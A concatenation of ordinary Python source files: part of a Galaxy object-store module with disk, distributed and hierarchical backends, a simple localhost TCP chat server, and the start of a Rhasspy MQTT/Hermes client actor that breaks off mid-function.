Note: need to be careful to not bypass dataset security with this.
"""
raise NotImplementedError()
@abc.abstractmethod
def get_store_usage_percent(self):
"""Return the percentage indicating how full the store is."""
raise NotImplementedError()
@abc.abstractmethod
def get_store_by(self, obj):
"""Return how object is stored (by 'uuid', 'id', or None if not yet saved).
Certain Galaxy remote data features aren't available if objects are stored by 'id'.
"""
raise NotImplementedError()
class BaseObjectStore(ObjectStore):
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
self.running = True
self.config = config
self.check_old_style = config.object_store_check_old_style
extra_dirs = {}
extra_dirs['job_work'] = config.jobs_directory
extra_dirs['temp'] = config.new_file_path
extra_dirs.update({
e['type']: e['path'] for e in config_dict.get('extra_dirs', [])})
self.extra_dirs = extra_dirs
def shutdown(self):
"""Close any connections for this ObjectStore."""
self.running = False
def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Check if a file corresponding to a dataset is ready to be used.
Return True if so, False otherwise
"""
return True
@classmethod
def parse_xml(clazz, config_xml):
"""Parse an XML description of a configuration for this object store.
Return a configuration dictionary (such as would correspond to the YAML configuration)
for the object store.
"""
raise NotImplementedError()
@classmethod
def from_xml(clazz, config, config_xml, **kwd):
config_dict = clazz.parse_xml(config_xml)
return clazz(config, config_dict, **kwd)
def to_dict(self):
extra_dirs = []
for extra_dir_type, extra_dir_path in self.extra_dirs.items():
extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
return {
'config': config_to_dict(self.config),
'extra_dirs': extra_dirs,
'type': self.store_type,
}
def _get_object_id(self, obj):
if hasattr(obj, self.store_by):
obj_id = getattr(obj, self.store_by)
if obj_id is None:
obj.flush()
return obj.id
return obj_id
else:
# job's don't have uuids, so always use ID in this case when creating
# job working directories.
return obj.id
def _invoke(self, delegate, obj=None, **kwargs):
return self.__getattribute__("_" + delegate)(obj=obj, **kwargs)
def exists(self, obj, **kwargs):
return self._invoke('exists', obj, **kwargs)
def create(self, obj, **kwargs):
return self._invoke('create', obj, **kwargs)
def empty(self, obj, **kwargs):
return self._invoke('empty', obj, **kwargs)
def size(self, obj, **kwargs):
return self._invoke('size', obj, **kwargs)
def delete(self, obj, **kwargs):
return self._invoke('delete', obj, **kwargs)
def get_data(self, obj, **kwargs):
return self._invoke('get_data', obj, **kwargs)
def get_filename(self, obj, **kwargs):
return self._invoke('get_filename', obj, **kwargs)
def update_from_file(self, obj, **kwargs):
return self._invoke('update_from_file', obj, **kwargs)
def get_object_url(self, obj, **kwargs):
return self._invoke('get_object_url', obj, **kwargs)
def get_store_usage_percent(self):
return self._invoke('get_store_usage_percent')
def get_store_by(self, obj, **kwargs):
return self._invoke('get_store_by', obj, **kwargs)
class ConcreteObjectStore(BaseObjectStore):
"""Subclass of ObjectStore for stores that don't delegate (non-nested).
Currently only adds store_by functionality. Which doesn't make
sense for the delegating object stores.
"""
def __init__(self, config, config_dict=None, **kwargs):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the following attributes:
* object_store_check_old_style (only used by the
:class:`DiskObjectStore` subclass)
* jobs_directory -- Each job is given a unique empty directory
as its current working directory. This option defines in what
parent directory those directories will be created.
* new_file_path -- Used to set the 'temp' extra_dir.
"""
if config_dict is None:
config_dict = {}
super().__init__(config=config, config_dict=config_dict, **kwargs)
self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
def to_dict(self):
rval = super().to_dict()
rval["store_by"] = self.store_by
return rval
def _get_store_by(self, obj):
return self.store_by
class DiskObjectStore(ConcreteObjectStore):
"""
Standard Galaxy object store.
Stores objects in files under a specific directory on disk.
>>> from galaxy.util.bunch import Bunch
>>> import tempfile
>>> file_path=tempfile.mkdtemp()
>>> obj = Bunch(id=1)
>>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
>>> s.create(obj)
>>> s.exists(obj)
True
>>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
"""
store_type = 'disk'
def __init__(self, config, config_dict):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`ObjectStore` plus:
* file_path -- Default directory to store objects to disk in.
* umask -- the permission bits for newly created files.
:type file_path: str
:param file_path: Override for the `config.file_path` value.
:type extra_dirs: dict
:param extra_dirs: Keys are string, values are directory paths.
"""
super().__init__(config, config_dict)
self.file_path = os.path.abspath(config_dict.get("files_dir") or config.file_path)
@classmethod
def parse_xml(clazz, config_xml):
extra_dirs = []
config_dict = {}
if config_xml is not None:
store_by = config_xml.attrib.get('store_by', None)
if store_by is not None:
config_dict['store_by'] = store_by
for e in config_xml:
if e.tag == 'files_dir':
config_dict["files_dir"] = e.get('path')
else:
extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
config_dict["extra_dirs"] = extra_dirs
return config_dict
def to_dict(self):
as_dict = super().to_dict()
as_dict["files_dir"] = self.file_path
return as_dict
def __get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
"""
Return the absolute path for the file corresponding to the `obj.id`.
This is regardless of whether or not the file exists.
"""
path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
obj_dir=False, old_style=True)
# For backward compatibility: check the old style root path first;
# otherwise construct hashed path.
if not os.path.exists(path):
return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
# TODO: rename to _disk_path or something like that to avoid conflicts with
# children that'll use the local_extra_dirs decorator, e.g. S3
def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
"""
Construct the absolute path for accessing the object identified by `obj.id`.
:type base_dir: string
:param base_dir: A key in self.extra_dirs corresponding to the base
directory in which this object should be created, or
None to specify the default directory.
:type dir_only: boolean
:param dir_only: If True, check only the path where the file
identified by `obj` should be located, not the
dataset itself. This option applies to `extra_dir`
argument as well.
:type extra_dir: string
:param extra_dir: Append the value of this parameter to the expected
path used to access the object identified by `obj` (e.g.,
/files/000/<extra_dir>/dataset_10.dat).
:type alt_name: string
:param alt_name: Use this name as the alternative name for the returned
dataset rather than the default.
:type old_style: boolean
param old_style: This option is used for backward compatibility. If
`True` then the composed directory structure does not include a
hash id (e.g., /files/dataset_10.dat (old) vs.
/files/000/dataset_10.dat (new))
"""
base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name and not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
obj_id = self._get_object_id(obj)
if old_style:
if extra_dir is not None:
path = os.path.join(base, extra_dir)
else:
path = base
else:
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj_id))
# Create a subdirectory for the object ID
if obj_dir:
rel_path = os.path.join(rel_path, str(obj_id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
path = os.path.join(base, rel_path)
if not dir_only:
assert obj_id is not None, "The effective dataset identifier consumed by object store [%s] must be set before a path can be constructed." % (self.store_by)
path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
return os.path.abspath(path)
def _exists(self, obj, **kwargs):
"""Override `ObjectStore`'s stub and check on disk."""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility: check root path first; otherwise
# construct and check hashed path.
if os.path.exists(path):
return True
return os.path.exists(self._construct_path(obj, **kwargs))
def _create(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by creating any files and folders on disk."""
if not self._exists(obj, **kwargs):
path = self._construct_path(obj, **kwargs)
dir_only = kwargs.get('dir_only', False)
# Create directory if it does not exist
dir = path if dir_only else os.path.dirname(path)
safe_makedirs(dir)
# Create the file if it does not exist
if not dir_only:
open(path, 'w').close() # Should be rb?
umask_fix_perms(path, self.config.umask, 0o666)
def _empty(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by checking file size on disk."""
return self.size(obj, **kwargs) == 0
def _size(self, obj, **kwargs):
"""Override `ObjectStore`'s stub by return file size on disk.
Returns 0 if the object doesn't exist yet or other error.
"""
if self._exists(obj, **kwargs):
try:
filepath = self._get_filename(obj, **kwargs)
for _ in range(0, 2):
size = os.path.getsize(filepath)
if size != 0:
break
# May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
time.sleep(0.01)
return size
except OSError:
return 0
else:
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
"""Override `ObjectStore`'s stub; delete the file or folder on disk."""
path = self._get_filename(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
obj_dir = kwargs.get('obj_dir', False)
try:
if entire_dir and (extra_dir or obj_dir):
shutil.rmtree(path)
return True
if self._exists(obj, **kwargs):
os.remove(path)
return True
except OSError as ex:
log.critical('{} delete error {}'.format(self.__get_filename(obj, **kwargs), ex))
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
"""Override `ObjectStore`'s stub; retrieve data directly from disk."""
data_file = open(self._get_filename(obj, **kwargs)) # Should be rb?
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
If `object_store_check_old_style` is set to `True` in config then the
root path is checked first.
"""
if self.check_old_style:
path = self._construct_path(obj, old_style=True, **kwargs)
# For backward compatibility, check root path first; otherwise,
# construct and return hashed path
if os.path.exists(path):
return path
path = self._construct_path(obj, **kwargs)
if not os.path.exists(path):
raise ObjectNotFound
return path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
"""`create` parameter is not used in this implementation."""
preserve_symlinks = kwargs.pop('preserve_symlinks', False)
# FIXME: symlinks and the object store model may not play well together
# these should be handled better, e.g. registering the symlink'd file
# as an object
if create:
self._create(obj, **kwargs)
if file_name and self._exists(obj, **kwargs):
try:
if preserve_symlinks and os.path.islink(file_name):
force_symlink(os.readlink(file_name), self._get_filename(obj, **kwargs))
else:
path = self._get_filename(obj, **kwargs)
shutil.copy(file_name, path)
umask_fix_perms(path, self.config.umask, 0o666)
except OSError as ex:
log.critical('Error copying {} to {}: {}'.format(file_name, self.__get_filename(obj, **kwargs), ex))
raise ex
def _get_object_url(self, obj, **kwargs):
"""
Override `ObjectStore`'s stub.
Returns `None`, we have no URLs.
"""
return None
def _get_store_usage_percent(self, **kwargs):
"""Override `ObjectStore`'s stub by return percent storage used."""
st = os.statvfs(self.file_path)
return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(BaseObjectStore):
"""
Base for ObjectStores that use other ObjectStores.
Example: DistributedObjectStore, HierarchicalObjectStore
"""
def __init__(self, config, config_xml=None):
"""Extend `ObjectStore`'s constructor."""
super().__init__(config)
self.backends = {}
def shutdown(self):
"""For each backend, shuts them down."""
for store in self.backends.values():
store.shutdown()
super().shutdown()
def _exists(self, obj, **kwargs):
"""Determine if the `obj` exists in any of the backends."""
return self._call_method('_exists', obj, False, False, **kwargs)
def file_ready(self, obj, **kwargs):
"""Determine if the file for `obj` is ready to be used by any of the backends."""
return self._call_method('file_ready', obj, False, False, **kwargs)
def _create(self, obj, **kwargs):
"""Create a backing file in a random backend."""
random.choice(list(self.backends.values())).create(obj, **kwargs)
def _empty(self, obj, **kwargs):
"""For the first backend that has this `obj`, determine if it is empty."""
return self._call_method('_empty', obj, True, False, **kwargs)
def _size(self, obj, **kwargs):
"""For the first backend that has this `obj`, return its size."""
return self._call_method('_size', obj, 0, False, **kwargs)
def _delete(self, obj, **kwargs):
"""For the first backend that has this `obj`, delete it."""
return self._call_method('_delete', obj, False, False, **kwargs)
def _get_data(self, obj, **kwargs):
"""For the first backend that has this `obj`, get data from it."""
return self._call_method('_get_data', obj, ObjectNotFound, True, **kwargs)
def _get_filename(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its filename."""
return self._call_method('_get_filename', obj, ObjectNotFound, True, **kwargs)
def _update_from_file(self, obj, **kwargs):
"""For the first backend that has this `obj`, update it from the given file."""
if kwargs.get('create', False):
self._create(obj, **kwargs)
kwargs['create'] = False
return self._call_method('_update_from_file', obj, ObjectNotFound, True, **kwargs)
def _get_object_url(self, obj, **kwargs):
"""For the first backend that has this `obj`, get its URL."""
return self._call_method('_get_object_url', obj, None, False, **kwargs)
def _get_store_by(self, obj):
return self._call_method('_get_store_by', obj, None, False)
def _repr_object_for_exception(self, obj):
try:
# there are a few objects in python that don't have __class__
obj_id = self._get_object_id(obj)
return f'{obj.__class__.__name__}({self.store_by}={obj_id})'
except AttributeError:
return str(obj)
def _call_method(self, method, obj, default, default_is_exception,
**kwargs):
"""Check all children object stores for the first one with the dataset."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return store.__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
class DistributedObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects they are created in a store selected randomly, but
with weighting.
"""
store_type = 'distributed'
def __init__(self, config, config_dict, fsmon=False):
"""
:type config: object
:param config: An object, most likely populated from
`galaxy/config.ini`, having the same attributes needed by
:class:`NestedObjectStore` plus:
* distributed_object_store_config_file
:type config_xml: ElementTree
:type fsmon: bool
:param fsmon: If True, monitor the file system for free space,
removing backends when they get too full.
"""
super().__init__(config, config_dict)
self.backends = {}
self.weighted_backend_ids = []
self.original_weighted_backend_ids = []
self.max_percent_full = {}
self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
random.seed()
for backend_def in config_dict["backends"]:
backened_id = backend_def["id"]
maxpctfull = backend_def.get("max_percent_full", 0)
weight = backend_def["weight"]
backend = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends[backened_id] = backend
self.max_percent_full[backened_id] = maxpctfull
for _ in range(0, weight):
# The simplest way to do weighting: add backend ids to a
# sequence the number of times equalling weight, then randomly
# choose a backend from that sequence at creation
self.weighted_backend_ids.append(backened_id)
self.original_weighted_backend_ids = self.weighted_backend_ids
self.sleeper = None
if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
self.sleeper = Sleeper()
self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
self.filesystem_monitor_thread.setDaemon(True)
self.filesystem_monitor_thread.start()
log.info("Filesystem space monitor started")
@classmethod
def parse_xml(clazz, config_xml, legacy=False):
if legacy:
backends_root = config_xml
else:
backends_root = config_xml.find('backends')
backends = []
config_dict = {
'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
'backends': backends,
}
for b in [e for e in backends_root if e.tag == 'backend']:
store_id = b.get("id")
store_weight = int(b.get("weight", 1))
store_maxpctfull = float(b.get('maxpctfull', 0))
store_type = b.get("type", "disk")
store_by = b.get('store_by', None)
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["id"] = store_id
backend_config_dict["weight"] = store_weight
backend_config_dict["max_percent_full"] = store_maxpctfull
backend_config_dict["type"] = store_type
if store_by is not None:
backend_config_dict["store_by"] = store_by
backends.append(backend_config_dict)
return config_dict
@classmethod
def from_xml(clazz, config, config_xml, fsmon=False):
legacy = False
if config_xml is None:
distributed_config = config.distributed_object_store_config_file
assert distributed_config is not None, \
"distributed object store ('object_store = distributed') " \
"requires a config file, please set one in " \
"'distributed_object_store_config_file')"
log.debug('Loading backends for distributed object store from %s', distributed_config)
config_xml = parse_xml(distributed_config).getroot()
legacy = True
else:
log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
config_dict = clazz.parse_xml(config_xml, legacy=legacy)
return clazz(config, config_dict, fsmon=fsmon)
def to_dict(self):
as_dict = super().to_dict()
as_dict["global_max_percent_full"] = self.global_max_percent_full
backends = []
for backend_id, backend in self.backends.items():
backend_as_dict = backend.to_dict()
backend_as_dict["id"] = backend_id
backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def shutdown(self):
"""Shut down. Kill the free space monitor if there is one."""
super().shutdown()
if self.sleeper is not None:
self.sleeper.wake()
def __filesystem_monitor(self):
while self.running:
new_weighted_backend_ids = self.original_weighted_backend_ids
for id, backend in self.backends.items():
maxpct = self.max_percent_full[id] or self.global_max_percent_full
pct = backend.get_store_usage_percent()
if pct > maxpct:
new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
self.weighted_backend_ids = new_weighted_backend_ids
self.sleeper.sleep(120) # Test free space every 2 minutes
def _create(self, obj, **kwargs):
"""The only method in which obj.object_store_id may be None."""
if obj.object_store_id is None or not self._exists(obj, **kwargs):
if obj.object_store_id is None or obj.object_store_id not in self.backends:
try:
obj.object_store_id = random.choice(self.weighted_backend_ids)
except IndexError:
raise ObjectInvalid('objectstore.create, could not generate '
'obj.object_store_id: %s, kwargs: %s'
% (str(obj), str(kwargs)))
log.debug("Selected backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
else:
log.debug("Using preferred backend '%s' for creation of %s %s"
% (obj.object_store_id, obj.__class__.__name__, obj.id))
self.backends[obj.object_store_id].create(obj, **kwargs)
def _call_method(self, method, obj, default, default_is_exception, **kwargs):
object_store_id = self.__get_store_id_for(obj, **kwargs)
if object_store_id is not None:
return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
if default_is_exception:
raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
% (method, self._repr_object_for_exception(obj), str(kwargs)))
else:
return default
def __get_store_id_for(self, obj, **kwargs):
if obj.object_store_id is not None:
if obj.object_store_id in self.backends:
return obj.object_store_id
else:
log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
% (obj.object_store_id, obj.__class__.__name__, obj.id))
# if this instance has been switched from a non-distributed to a
# distributed object store, or if the object's store id is invalid,
# try to locate the object
for id, store in self.backends.items():
if store.exists(obj, **kwargs):
log.warning('%s object with ID %s found in backend object store with ID %s'
% (obj.__class__.__name__, obj.id, id))
obj.object_store_id = id
return id
return None
class HierarchicalObjectStore(NestedObjectStore):
"""
ObjectStore that defers to a list of backends.
When getting objects the first store where the object exists is used.
When creating objects only the first store is used.
"""
store_type = 'hierarchical'
def __init__(self, config, config_dict, fsmon=False):
"""The default contructor. Extends `NestedObjectStore`."""
super().__init__(config, config_dict)
backends = OrderedDict()
for order, backend_def in enumerate(config_dict["backends"]):
backends[order] = build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon)
self.backends = backends
@classmethod
def parse_xml(clazz, config_xml):
backends_list = []
for b in sorted(config_xml.find('backends'), key=lambda b: int(b.get('order'))):
store_type = b.get("type")
objectstore_class, _ = type_to_object_store_class(store_type)
backend_config_dict = objectstore_class.parse_xml(b)
backend_config_dict["type"] = store_type
backends_list.append(backend_config_dict)
return {"backends": backends_list}
def to_dict(self):
as_dict = super().to_dict()
backends = []
for backend in self.backends.values():
backend_as_dict = backend.to_dict()
backends.append(backend_as_dict)
as_dict["backends"] = backends
return as_dict
def _exists(self, obj, **kwargs):
"""Check all child object stores."""
for store in self.backends.values():
if store.exists(obj, **kwargs):
return True
return False
def _create(self, obj, **kwargs):
"""Call the primary object store."""
self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
objectstore_class = None
objectstore_constructor_kwds = {}
if store == 'disk':
objectstore_class = DiskObjectStore
elif store == 's3':
from .s3 import S3ObjectStore
objectstore_class = S3ObjectStore
elif store == 'cloud':
from .cloud import Cloud
objectstore_class = Cloud
elif store == 'swift':
from .s3 import SwiftObjectStore
objectstore_class = SwiftObjectStore
elif store == 'distributed':
objectstore_class = DistributedObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'hierarchical':
objectstore_class = HierarchicalObjectStore
objectstore_constructor_kwds["fsmon"] = fsmon
elif store == 'irods':
from .irods import IRODSObjectStore
objectstore_class = IRODSObjectStore
elif store == 'azure_blob':
from .azure_blob import AzureBlobObjectStore
objectstore_class = AzureBlobObjectStore
elif store == 'pithos':
from .pithos import PithosObjectStore
objectstore_class = PithosObjectStore
# Disable the Pulsar object store for now until it receives some attention
# elif store == 'pulsar':
# from .pulsar import PulsarObjectStore
# return PulsarObjectStore(config=config, config_xml=config_xml)
return objectstore_class, objectstore_constructor_kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
"""
Invoke the appropriate object store.
Will use the `object_store_config_file` attribute of the `config` object to
configure a new object store from the specified XML file.
Or you can specify the object store type in the `object_store` attribute of
the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
'hierarchical', 'irods', and 'pulsar' are supported values.
"""
from_object = 'xml'
if config is None and config_dict is not None and 'config' in config_dict:
# Build a config object from to_dict of an ObjectStore.
config = Bunch(**config_dict["config"])
elif config is None:
raise Exception("build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict")
if config_xml is None and config_dict is None:
config_file = config.object_store_config_file
if os.path.exists(config_file):
if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
# This is a top level invocation of build_object_store_from_config, and
# we have an object_store_conf.xml -- read the .xml and build
# accordingly
config_xml = parse_xml(config.object_store_config_file).getroot()
store = config_xml.get('type')
else:
with open(config_file) as f:
config_dict = yaml.safe_load(f)
from_object = 'dict'
store = config_dict.get('type')
else:
store = config.object_store
elif config_xml is not None:
store = config_xml.get('type')
elif config_dict is not None:
from_object = 'dict'
store = config_dict.get('type')
objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
if objectstore_class is None:
log.error(f"Unrecognized object store definition: {store}")
if from_object == 'xml':
return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
else:
return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
"""Non-local plugin decorator using local directories for the extra_dirs (job_work and temp)."""
def wraps(self, *args, **kwargs):
if kwargs.get('base_dir', None) is None:
return func(self, *args, **kwargs)
else:
for c in self.__class__.__mro__:
if c.__name__ == 'DiskObjectStore':
return getattr(c, func.__name__)(self, *args, **kwargs)
raise Exception("Could not call DiskObjectStore's %s method, does your "
"Object Store plugin inherit from DiskObjectStore?"
% func.__name__)
return wraps
def convert_bytes(bytes):
"""A helper function used for pretty printing disk usage."""
if bytes is None:
bytes = 0
bytes = float(bytes)
if bytes >= 1099511627776:
terabytes = bytes / 1099511627776
size = '%.2fTB' % terabytes
elif bytes >= 1073741824:
gigabytes = bytes / 1073741824
size = '%.2fGB' % gigabytes
elif bytes >= 1048576:
megabytes = bytes / 1048576
size = '%.2fMB' % megabytes
elif bytes >= 1024:
kilobytes = bytes / 1024
size = '%.2fKB' % kilobytes
else:
size = '%.2fb' % bytes
return size
def config_to_dict(config):
"""Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
"""
return {
'object_store_check_old_style': config.object_store_check_old_style,
'file_path': config.file_path,
'umask': config.umask,
'jobs_directory': config.jobs_directory,
'new_file_path': config.new_file_path,
'object_store_cache_path': config.object_store_cache_path,
'gid': config.gid,
}
class ObjectStorePopulator:
""" Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, app, user):
self.object_store = app.object_store
self.object_store_id = None
self.user = user
def set_object_store_id(self, data):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
data.dataset.object_store_id = self.object_store_id
try:
self.object_store.create(data.dataset)
except ObjectInvalid:
raise Exception('Unable to create output dataset: object store is full')
self.object_store_id = data.dataset.object_store_id # these will be the same thing after the first output
|
server.py
|
#imports
import socket
import threading
class ChatServer:
clients_list = []
last_received_message = ""
def __init__(self):
self.server_socket = None
self.create_listening_server()
#listen for incoming connection
def create_listening_server(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #create a socket using TCP port and ipv4
local_ip = '127.0.0.1'
local_port = 10319
# this will allow you to immediately restart a TCP server
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# this makes the server listen to requests coming from other computers on the network
self.server_socket.bind((local_ip, local_port))
print("Listening for incoming messages..")
self.server_socket.listen(5) #listen for incomming connections / max 5 clients
self.receive_messages_in_a_new_thread()
#fun to receive new msgs
def receive_messages(self, so):
while True:
incoming_buffer = so.recv(256) #initialize the buffer
if not incoming_buffer:
break
self.last_received_message = incoming_buffer.decode('utf-8')
self.broadcast_to_all_clients(so) # send to all clients
so.close()
#broadcast the message to all clients
def broadcast_to_all_clients(self, senders_socket):
for client in self.clients_list:
socket, (ip, port) = client
if socket is not senders_socket:
socket.sendall(self.last_received_message.encode('utf-8'))
def receive_messages_in_a_new_thread(self):
while True:
client = so, (ip, port) = self.server_socket.accept()
self.add_to_clients_list(client)
print('Connected to ', ip, ':', str(port))
t = threading.Thread(target=self.receive_messages, args=(so,))
t.start()
#add a new client
def add_to_clients_list(self, client):
if client not in self.clients_list:
self.clients_list.append(client)
if __name__ == "__main__":
ChatServer()
|
mqtt.py
|
"""Support for MQTT input/output."""
import json
import socket
import threading
import time
from collections import defaultdict
from queue import Queue
from typing import Any, Dict, List
import pydash
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
MqttConnected,
MqttDisconnected,
MqttMessage,
MqttPublish,
MqttSubscribe,
)
# -----------------------------------------------------------------------------
# Events
# -----------------------------------------------------------------------------
class MessageReady:
"""Internal event for actor."""
pass
# -----------------------------------------------------------------------------
# Interoperability with Snips.AI Hermes protocol
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesMqtt(RhasspyActor):
"""Communicate with MQTT broker using Hermes protocol."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.client = None
self.connected = False
self.subscriptions: Dict[str, List[RhasspyActor]] = defaultdict(list)
self.publications: Dict[str, List[bytes]] = defaultdict(list)
self.message_queue: Queue = Queue()
self.site_ids: List[str] = []
self.site_id = "default"
self.host = "localhost"
self.port = 1883
self.username = ""
self.password = None
self.reconnect_sec = 5
self.publish_intents = True
self.tls = {"enabled": False}
# -------------------------------------------------------------------------
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
# Load settings
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
if self.site_ids:
self.site_id = self.site_ids[0]
else:
self.site_id = "default"
self.host = self.profile.get("mqtt.host", "localhost")
self.port = int(self.profile.get("mqtt.port", 1883))
self.username = self.profile.get("mqtt.username", "")
self.password = self.profile.get("mqtt.password", None)
self.reconnect_sec = self.profile.get("mqtt.reconnect_sec", 5)
self.publish_intents = self.profile.get("mqtt.publish_intents", True)
self.tls = self.profile.get("mqtt.tls", {"enabled": False})
if self.profile.get("mqtt.enabled", False):
self.transition("connecting")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
self.save_for_later(message, sender)
def to_connecting(self, from_state: str) -> None:
"""Transition to connecting state."""
import paho.mqtt.client as mqtt
self.client = mqtt.Client()
assert self.client is not None
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_disconnect = self.on_disconnect
if pydash.get(self.tls, "enabled", False):
import ssl
allowed_cert_reqs = {
"CERT_REQUIRED": ssl.CERT_REQUIRED,
"CERT_OPTIONAL": ssl.CERT_OPTIONAL,
"CERT_NONE": ssl.CERT_NONE,
}
self.client.tls_set(
ca_certs=pydash.get(self.tls, "ca_certs", None),
cert_reqs=pydash.get(
allowed_cert_reqs,
pydash.get(self.tls, "cert_reqs", "CERT_REQUIRED"),
ssl.CERT_REQUIRED,
),
certfile=pydash.get(self.tls, "certfile", None),
ciphers=pydash.get(self.tls, "ciphers", None),
keyfile=pydash.get(self.tls, "keyfile", None),
tls_version=ssl.PROTOCOL_TLS,
)
if self.username:
self._logger.debug("Logging in as %s", self.username)
self.client.username_pw_set(self.username, self.password)
self._logger.debug("Connecting to MQTT broker %s:%s", self.host, self.port)
def do_connect():
success = False
while not success:
try:
ret = self.client.connect(self.host, self.port)
self.client.loop_start()
while (ret != 0) and (self.reconnect_sec > 0):
self._logger.warning("Connection failed: %s", ret)
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
ret = self.client.connect(self.host, self.port)
success = True
except Exception:
self._logger.exception("connecting")
if self.reconnect_sec > 0:
self._logger.debug(
"Reconnecting in %s second(s)", self.reconnect_sec
)
time.sleep(self.reconnect_sec)
self._logger.debug("Connection successful.")
# Connect in a separate thread
threading.Thread(target=do_connect, daemon=True).start()
def in_connecting(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in connecting."""
if isinstance(message, MqttConnected):
self.connected = True
self.transition("connected")
elif isinstance(message, MqttDisconnected):
